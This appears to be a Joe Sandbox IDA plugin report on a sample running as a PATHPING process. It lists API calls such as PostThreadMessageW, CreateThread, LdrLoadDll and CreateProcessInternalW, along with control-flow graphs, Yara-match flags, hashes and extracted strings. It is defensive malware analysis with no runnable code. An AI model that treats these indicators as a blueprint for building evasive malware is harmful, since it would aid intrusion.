                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ef28cdd7d97d874eb359ec1ae92e23d0baf44edc72b92a7b4cf16c97fce293dd
                                                                                                                                • Instruction ID: 8d1e3b74629ff64164c93fcadf2fef745839ced64e969948833c539176cdbd67
                                                                                                                                • Opcode Fuzzy Hash: ef28cdd7d97d874eb359ec1ae92e23d0baf44edc72b92a7b4cf16c97fce293dd
                                                                                                                                • Instruction Fuzzy Hash: B090023120541802D2807158440564B000587E1305F95C015A0029774DCE158F5D77B1
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d2493081d2b2187f84ad5718e1222be11566af14c168db591a0330e4dbf740ea
                                                                                                                                • Instruction ID: 1e1aeaa4ac82d7d1abbbd2110eaa026fed30bab2a77d2ff5ca6fbb08163249a3
                                                                                                                                • Opcode Fuzzy Hash: d2493081d2b2187f84ad5718e1222be11566af14c168db591a0330e4dbf740ea
                                                                                                                                • Instruction Fuzzy Hash: 2690023120945842D24071584405A47001587E0309F55C011A00687B4D9A258E59B671
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 97746f27eb874a90a5a16f1cec0fd6a66f6256c7e823d8f9ae5d1604c3216520
                                                                                                                                • Instruction ID: 2fe6104bd114e98315967e25fc4deef551eeab56323f157fb4c0d99d226de057
                                                                                                                                • Opcode Fuzzy Hash: 97746f27eb874a90a5a16f1cec0fd6a66f6256c7e823d8f9ae5d1604c3216520
                                                                                                                                • Instruction Fuzzy Hash: F990023120541413D21171584505707000987E0245F95C412A0428678D9A568E56B131
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: e0ed288a17f58bd30100a8b3ac8bb1c68de2df50df054e4b03672ef083c53b6c
                                                                                                                                • Instruction ID: 3b1c96d467f818a610a92726576bd18e800a35e317f695a025a4f1c3a0f39c27
                                                                                                                                • Opcode Fuzzy Hash: e0ed288a17f58bd30100a8b3ac8bb1c68de2df50df054e4b03672ef083c53b6c
                                                                                                                                • Instruction Fuzzy Hash: C690022921741002D2807158540960B000587E1206F95D415A0019678CCD158D6D6331
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: eca3439cad0416f4fcbdf9b1ce62db60a64d09347df1ed1acbdc4f4218a4e4f5
                                                                                                                                • Instruction ID: 4fe231a813851d6e8a07c48a2609d21a3017b32fd93a315500a04243ac2965f9
                                                                                                                                • Opcode Fuzzy Hash: eca3439cad0416f4fcbdf9b1ce62db60a64d09347df1ed1acbdc4f4218a4e4f5
                                                                                                                                • Instruction Fuzzy Hash: 0E90022130541003D240715854196074005D7F1305F55D011E0418674CDD158D5A6232
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b4428ac601cadfbcfe0647a291436eea30528cf6e89b3bcf792a0dda99daf2ca
                                                                                                                                • Instruction ID: 6b1254f6eaccc3a127ea91478a477a2487c8a2bb211cd98518708e748405ce00
                                                                                                                                • Opcode Fuzzy Hash: b4428ac601cadfbcfe0647a291436eea30528cf6e89b3bcf792a0dda99daf2ca
                                                                                                                                • Instruction Fuzzy Hash: FB90023160951402D20071584515707100587E0205F65C411A0428678D8B958E5575B2
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 822d1fb9f7cb9b4e16c74ee91facd78be6036a28d31af0cbc5a78556df1d84fe
                                                                                                                                • Instruction ID: 0c9bc7debb5b7e4e1ec2798e2e33b3ec417c36000acddda04f9f2889e6c26c8d
                                                                                                                                • Opcode Fuzzy Hash: 822d1fb9f7cb9b4e16c74ee91facd78be6036a28d31af0cbc5a78556df1d84fe
                                                                                                                                • Instruction Fuzzy Hash: BD90022124946102D250715C44056174005A7F0205F55C021A08186B4D89558D597231

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 301 410810-41082b 304 4107bb-4107c5 301->304 305 41082d-41083c 301->305 308 4107c7-4107dc call 4103c0 304->308 309 4107de-4107f2 call 410450 304->309 306 4107f3 305->306 307 41083e-410843 305->307 310 4108b2 307->310 311 4108b6-4108c1 307->311 308->309 319 410760-41079a call 42b050 call 42b660 call 421730 308->319 309->306 310->311 314 4108c3-4108d3 311->314 314->310 318 4108d5-4108fe 314->318 318->314 321 410900-410923 318->321 319->308 335 41079c-4107a2 319->335 325 410925-41093a 321->325 326 410999 321->326 328 4109b2-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 325->328 329 41093c-41093d 325->329 326->328 351 410a3a-410a40 328->351 352 410a1c-410a2b PostThreadMessageW 328->352 337 4107f4-4107f7 335->337 338 4107a4-4107c5 call 424d70 335->338 337->308 339 4107f9-41080d call 426830 337->339 338->308 338->309 339->308 352->351 353 410a2d-410a37 352->353 353->351
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 0-1925500867
                                                                                                                                • Opcode ID: 21a8906d28afc49824afa18c601eafe4830de5cd4ffd640c606c7b2adf2aecd3
                                                                                                                                • Instruction ID: b847c43ee7c2bcce045d12a16670b214c68b84230fb8e870f8c8ffe74ad1cfaf
                                                                                                                                • Opcode Fuzzy Hash: 21a8906d28afc49824afa18c601eafe4830de5cd4ffd640c606c7b2adf2aecd3
                                                                                                                                • Instruction Fuzzy Hash: FD511E7290021D7FDB11AA648C419EFBBBCEF81368F04866AF800A7141D7695D86CBD9

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 383 41093f-41095c 384 410916-410923 383->384 385 41095e-410969 383->385 388 410925-41093a 384->388 389 410999 384->389 386 41096b-410998 385->386 387 4109bd-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 385->387 386->389 402 410a3a-410a40 387->402 403 410a1c-410a2b PostThreadMessageW 387->403 391 4109b2-4109bb 388->391 392 41093c-41093d 388->392 389->391 391->387 403->402 404 410a2d-410a37 403->404 404->402
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00410A27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 6ef0edf071b7ee54144f16f609fc9f346e420deed3876b7cdd17c4a4ddb161fe
                                                                                                                                • Instruction ID: 427c85081ad36f8c7c53bdc1822b8f0277954a912e1e9715cc7c0dd23f87546f
                                                                                                                                • Opcode Fuzzy Hash: 6ef0edf071b7ee54144f16f609fc9f346e420deed3876b7cdd17c4a4ddb161fe
                                                                                                                                • Instruction Fuzzy Hash: 4231FE72E543487FEF21CAA54C51DEF3BACDEA5364B00845AF510AB241D76C8D4387E6

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 405 4109b0-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 417 410a3a-410a40 405->417 418 410a1c-410a2b PostThreadMessageW 405->418 418->417 419 410a2d-410a37 418->419 419->417
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00410A27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 484300885e35b065d1096965fd2e9791678065f8507569ebba2a1c1d5c9236e4
                                                                                                                                • Instruction ID: 0f6722a2238d94f06cb47184848a6fcad7e741c16efdbcb73104cc78658ecbc6
                                                                                                                                • Opcode Fuzzy Hash: 484300885e35b065d1096965fd2e9791678065f8507569ebba2a1c1d5c9236e4
                                                                                                                                • Instruction Fuzzy Hash: 1901D6B1D4021C7AEB11AAE28C82DEF7B7CDF54798F408069FA14B7241E6785E0687F5

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409DB5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID: uAs$f_
                                                                                                                                • API String ID: 2422867632-1128715547
                                                                                                                                • Opcode ID: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                                • Instruction ID: 526c3ddfb7f1d9dbfa4302d2da5cd07acfe9038140e984a4955d8af2f9f960e5
                                                                                                                                • Opcode Fuzzy Hash: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                                • Instruction Fuzzy Hash: C9114C72A4121876D7206A999C03FDFBBACDF45714F10005AFA08BB2C3D6B46A4087FD
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 004236DB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00417E9E,00000010,?,?,?,00000044,?,00000010,00417E9E,?,?,?), ref: 004293A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409DB5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(00411649,?,0042527F,00411649,004251DF,0042527F,?,00411649,004251DF,00001000,?,?,00000000), ref: 0042929F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,004139D6,000000F4), ref: 004292EF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction ID: 21fc7c0ddad84c324fee04ffd52fdd38f9a651d12109145d0747e93963df6a3e
                                                                                                                                • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction Fuzzy Hash: C1E06D72200204BBDA10EE59DC41EAB37ACDFC9724F404019F908A7242C674B91186B9
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 00417F0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                                • Instruction ID: b8e6d0830a8cd14578ec29319d9a4e6f5182beab166be2eaa619b699c8681a91
                                                                                                                                • Opcode Fuzzy Hash: 53d29c82f52b957d9f67e65202dd129e0b91a26103301d23a613c35b2bc8e6ec
                                                                                                                                • Instruction Fuzzy Hash: 46E0203124020427F7205E68DC45FB7336C478C764F584A51F81CDB3C1E63CF8424154
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 00417F0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                                • Instruction ID: e75d1b2769bc9a0b1a79463f8d35322dd951a24b024012b3ff9301ec17df101b
                                                                                                                                • Opcode Fuzzy Hash: bcda1792175244ccc46f8540d3439c88d9e62693d137ea7d247dc54d411d73a5
                                                                                                                                • Instruction Fuzzy Hash: 58E0D83124430427E7205E58CC45FA733684B48765F584A11F814AB2C1D638E9424254
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00411940,00427B1F,004251DF,00411906), ref: 00417D03
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                                • Instruction ID: ab0f843539eed372df292286437dcf74d2235a3bdd9dc4ee03245b8632253c49
                                                                                                                                • Opcode Fuzzy Hash: 5f88bc61a3014c15c064a01038728c29e2d6e49de9f991d3aa44fa949bf6a591
                                                                                                                                • Instruction Fuzzy Hash: 7FD05E722813043BF600A6A6AC07F6632AC8B90755F49846AB908EB2D3F879E4004669
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6f1932f60152c5dd935e51ed8d349fb564cc0419c6f6f6568406c72e73fe34fd
                                                                                                                                • Instruction ID: 35e8658e1ab575ec7b82f82a34a628790ccccee93176fd79c8d6f82d84c7105b
                                                                                                                                • Opcode Fuzzy Hash: 6f1932f60152c5dd935e51ed8d349fb564cc0419c6f6f6568406c72e73fe34fd
                                                                                                                                • Instruction Fuzzy Hash: 0DB09B719055D5D6DB11E7605A0D717790167E0705F15C061D30347A1E4739C5D5F175
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4121929401.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2b00000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                                • Instruction ID: 6ba49e49334d912b49a59ad14f5adcc743b6fe74b87f3e9f3ca79a295951219f
                                                                                                                                • Opcode Fuzzy Hash: 5980dba0d7954c9c78fefc854ded5a613155a8df57f772f151d519c62611a94d
                                                                                                                                • Instruction Fuzzy Hash: 8E41EA7151CB0D4FD368BF6890C177AB7E2FB45300F50496DD98AC3692EB70E8468B85
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4121929401.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2b00000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                • Opcode ID: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                                • Instruction ID: e1e8736e2e028aafd8cd364e494197078d660145bf443b374f031d7705287770
                                                                                                                                • Opcode Fuzzy Hash: 1b334d22ca8f35166475ef0e57b6c0bf2ed59f2c579f69a47e29a63819b07711
                                                                                                                                • Instruction Fuzzy Hash: 2F915FF04482988AC7158F54A0612AFFFB1EBC6305F15856DE7E6BB243C3BE8945CB85
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
